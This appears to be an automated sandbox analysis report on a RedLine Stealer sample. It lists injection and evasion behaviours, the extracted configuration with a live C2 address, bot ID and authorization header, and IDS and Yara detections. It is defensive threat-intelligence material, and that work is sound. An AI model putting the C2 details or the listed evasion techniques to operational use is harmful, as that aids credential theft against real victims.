Windows Analysis Report
uFVgJVXaEU.exe

Overview

General Information

Sample name: uFVgJVXaEU.exe
renamed because original name is a hash value
Original sample name: bfae2c479a12cbc660e580a84d3e3ce0.exe
Analysis ID: 1576604
MD5: bfae2c479a12cbc660e580a84d3e3ce0
SHA1: 0891b36b510049ef811deb93fcdacfdfdbfc406a
SHA256: 2ea05b5b9847fb2e777f4433a2f73cba12b96a8b074ab83179cbafbc49963665
Tags: exe, user-abuse_ch
Infos:

Detection

RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • uFVgJVXaEU.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\uFVgJVXaEU.exe" MD5: BFAE2C479A12CBC660E580A84D3E3CE0)
    • audiodg.exe (PID: 7660 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
    • svchost.exe (PID: 7668 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • F72F.tmp.ssg.exe (PID: 7860 cmdline: "C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
        • 2F409E82DCA61388941053.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe" MD5: BFAE2C479A12CBC660E580A84D3E3CE0)
          • svchost.exe (PID: 7956 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 7968 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 7976 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • 21AB.tmp.zx.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe" MD5: BB0BE25BDD2121FA0BDDF6AC59D4FA8D)
          • 21AB.tmp.zx.exe (PID: 1528 cmdline: "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe" MD5: BB0BE25BDD2121FA0BDDF6AC59D4FA8D)
        • 2F409E82DCA61388941053.exe (PID: 7212 cmdline: "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe" MD5: BFAE2C479A12CBC660E580A84D3E3CE0)
          • svchost.exe (PID: 7280 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 7308 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 7324 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7676 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3decd:$s2: ReflectiveLoader@
00000006.00000000.1490441463.00000000004C2000.00000002.00000001.01000000.00000005.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000005.00000000.1435821747.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3decd:$s2: ReflectiveLoader@
00000005.00000003.1489240627.000000000A37D000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3decd:$s2: ReflectiveLoader@

Source | Rule | Description | Author | Strings
5.0.explorer.exe.e100000.5.raw.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3decd:$s2: ReflectiveLoader@
5.2.explorer.exe.8220535.0.raw.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3d0cd:$s2: ReflectiveLoader@
5.2.explorer.exe.e080535.5.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3c2cd:$s2: ReflectiveLoader@
6.0.F72F.tmp.ssg.exe.4c0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
5.0.explorer.exe.c1b2c20.1.raw.unpack | INDICATOR_SUSPICIOUS_ReflectiveLoader | detects Reflective DLL injection artifacts | ditekSHen | 0x3d0cd:$s2: ReflectiveLoader@

              System Summary

              Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\uFVgJVXaEU.exe, ProcessId: 7600, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
              Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\msiexec.exe, SourceProcessId: 7676, StartAddress: E080000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 4084
              Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uFVgJVXaEU.exe", ParentImage: C:\Users\user\Desktop\uFVgJVXaEU.exe, ParentProcessId: 7600, ParentProcessName: uFVgJVXaEU.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7668, ProcessName: svchost.exe
              Source: Process started | Author: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uFVgJVXaEU.exe", ParentImage: C:\Users\user\Desktop\uFVgJVXaEU.exe, ParentProcessId: 7600, ParentProcessName: uFVgJVXaEU.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7668, ProcessName: svchost.exe
              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-17T10:15:06.336483+0100 | 2043234 | 1 | A Network Trojan was detected | 185.81.68.147 | 1912 | 192.168.2.8 | 49710 | TCP

              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-17T10:15:05.892902+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:11.498795+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:12.125807+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:12.671198+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:14.250236+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:14.814311+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:15.314297+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:16.035094+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:16.503808+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:16.984893+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:17.437884+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:18.066653+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:18.084242+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:18.532245+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:18.973784+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:19.415304+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:19.851257+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:20.336637+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:20.799615+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:21.240256+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:22.794899+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:23.245593+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:23.685906+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP
              2024-12-17T10:15:24.159621+0100 | 2043231 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP

              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-17T10:15:12.247937+0100 | 2046056 | 1 | A Network Trojan was detected | 185.81.68.147 | 1912 | 192.168.2.8 | 49710 | TCP

              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-17T10:15:02.108574+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49708 | 185.81.68.147 | 80 | TCP
              2024-12-17T10:15:04.677281+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49709 | 185.81.68.147 | 80 | TCP

              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2024-12-17T10:15:05.892902+0100 | 2046045 | 1 | A Network Trojan was detected | 192.168.2.8 | 49710 | 185.81.68.147 | 1912 | TCP

              AV Detection

              Source: 6.0.F72F.tmp.ssg.exe.4c0000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | ReversingLabs: Detection: 33%
              Source: C:\Users\user\AppData\Local\Temp\2D25.tmp.update.exe | ReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | ReversingLabs: Detection: 91%
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe | ReversingLabs: Detection: 57%
              Source: uFVgJVXaEU.exe | ReversingLabs: Detection: 57%
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\2D25.tmp.update.exe | Joe Sandbox ML: detected
              Source: uFVgJVXaEU.exe | Joe Sandbox ML: detected
              Source: uFVgJVXaEU.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609827265.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610543566.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605079743.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1632238467.00007FFBBB935000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605738557.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604778086.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607581691.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609401461.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611370859.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1632487423.00007FFBC3201000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605348657.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607843222.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607058503.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608628812.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604870009.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.amd64.pdbGCTL source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1632632314.00007FFBC321E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606094024.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604568784.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604985991.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608404585.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
              Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606490661.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: 21AB.tmp.zx.exe, 0000000D.00000002.1632238467.00007FFBBB935000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: vcruntime140.amd64.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1632632314.00007FFBC321E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611718162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605261861.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607206409.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605956547.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604669158.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608235922.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1631752112.00007FFBAAE7D000.00000002.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610124454.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605640873.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606311059.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605846257.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611918910.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606809485.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607729908.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606922801.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605173726.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610339466.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605543300.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605445250.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609596519.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611567066.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Code function: 12_2_00007FF7F24F79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_00007FF7F24F79B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Code function: 12_2_00007FF7F24F85A0 FindFirstFileExW,FindClose,12_2_00007FF7F24F85A0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Code function: 12_2_00007FF7F2510B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Code function: 13_2_00007FF7F24F85A0 FindFirstFileExW,FindClose,13_2_00007FF7F24F85A0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Code function: 13_2_00007FF7F2510B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Code function: 13_2_00007FF7F24F79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00007FF7F24F79B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Code function: 13_2_00007FFBBB8F303C FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBBB8F303C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe | Code function: 13_2_00007FFBBB8F3280 FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBBB8F3280

              Networking

              Source: Network traffic | Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.8:49710 -> 185.81.68.147:1912
              Source: Network traffic | Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.8:49710 -> 185.81.68.147:1912
              Source: Network traffic | Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.8:49710
